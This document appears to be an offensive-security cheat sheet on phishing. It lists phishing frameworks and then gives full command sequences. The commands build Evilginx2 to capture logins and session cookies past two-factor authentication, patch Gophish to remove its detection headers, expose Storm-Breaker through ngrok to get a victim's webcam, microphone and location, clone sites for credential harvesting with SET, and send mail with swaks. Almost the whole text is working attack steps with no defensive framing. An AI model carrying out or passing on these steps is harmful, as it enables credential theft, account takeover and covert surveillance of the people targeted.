Name | Description | URL |
---|---|---|
BlackPhish | Super lightweight with many features and blazing fast speeds. | https://github.com/iinc0gnit0/BlackPhish |
Evilginx2 Phishlets | Evilginx2 Phishlets version (0.2.3) Only For Testing/Learning Purposes | https://github.com/An0nUD4Y/Evilginx2-Phishlets |
evilginx2 | Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication | https://github.com/kgretzky/evilginx2 |
evilgophish | evilginx2 + gophish | https://github.com/fin3ss3g0d/evilgophish |
EvilnoVNC | Ready to go Phishing Platform | https://github.com/JoelGMSec/EvilnoVNC |
Gophish | Open-Source Phishing Toolkit | https://github.com/gophish/gophish |
Nexphisher | Advanced Phishing tool for Linux & Termux | https://github.com/htr-tech/nexphisher |
SocialFish | Phishing Tool & Information Collector | https://github.com/UndeadSec/SocialFish |
SniperPhish | SniperPhish - The Web-Email Spear Phishing Toolkit | https://github.com/GemGeorge/SniperPhish |
Storm Breaker | Social engineering tool [Access Webcam & Microphone & Location Finder] With {Py,JS,PHP} | https://github.com/ultrasecurity/Storm-Breaker |
The Social-Engineer Toolkit (SET) | The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. | https://github.com/trustedsec/social-engineer-toolkit |
$ sudo apt-get install golang
$ git clone https://github.com/kgretzky/evilginx2.git
$ cd evilginx2
$ make
$ sudo ./build/evilginx -p ./phishlets
$ sudo ./build/evilginx -p ./phishlets -t ./redirectors -developer
: phishlets
: lures
: sessions
$ sudo cp /root/.evilginx/crt/ca.crt /usr/local/share/ca-certificates/evilginx.crt
$ sudo update-ca-certificates
: config domain <DOMAIN>
: config ipv4 <LHOST>
: phishlets hostname <PHISHLET> <DOMAIN>
: phishlets enable <PHISHLET>
: lures create <PHISHLET>
: lures get-url <ID>
: sessions
: sessions <ID>
https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean
$ git clone https://github.com/gophish/gophish
$ wget "https://raw.githubusercontent.com/puzzlepeaches/sneaky_gophish/main/files/404.html" -O "404.html"
$ wget "https://raw.githubusercontent.com/puzzlepeaches/sneaky_gophish/main/files/phish.go" -O "phish.go"
$ rm gophish/controllers/phish.go
$ mv phish.go gophish/controllers/phish.go
$ mv 404.html gophish/templates/404.html
$ cd gophish
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go
$ sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go
$ sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go
$ read -p 'Custom RID Parameter: ' uservar
$ sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "'$uservar'"/g' models/campaign.go
$ go build
$ ssh -i ~/.ssh/<SSH_KEY> root@<RHOST> -p <RPORT> -L 3333:localhost:3333 -N -f
https://medium.com/@frost1/access-location-camera-microphone-of-any-device-547c5b9907f3
$ git clone https://github.com/ultrasecurity/Storm-Breaker.git
$ cd Storm-Breaker
$ sudo bash install.sh
$ sudo python3 -m pip install -r requirements.txt
$ sudo python3 st.py
$ ngrok http 2525
http://8d0b-92-180-8-97.ngrok-free.app -> http://localhost:2525
Username | Password |
---|---|
admin | admin |
Chose a link to send to the target.
http://8d0b-92-180-8-97.ngrok-free.app/templates/nearyou/index.html
$ sudo setoolkit
Navigate to Social-Engineering Attacks
> Website Attack Vectors
> Credential Harvester Attack
> Site Cloner
== 1
, 2
, 3
, 2
.
$ swaks --to <EMAIL> --from <EMAIL> --server <RHOST> --port 25 --body <FILE>.txt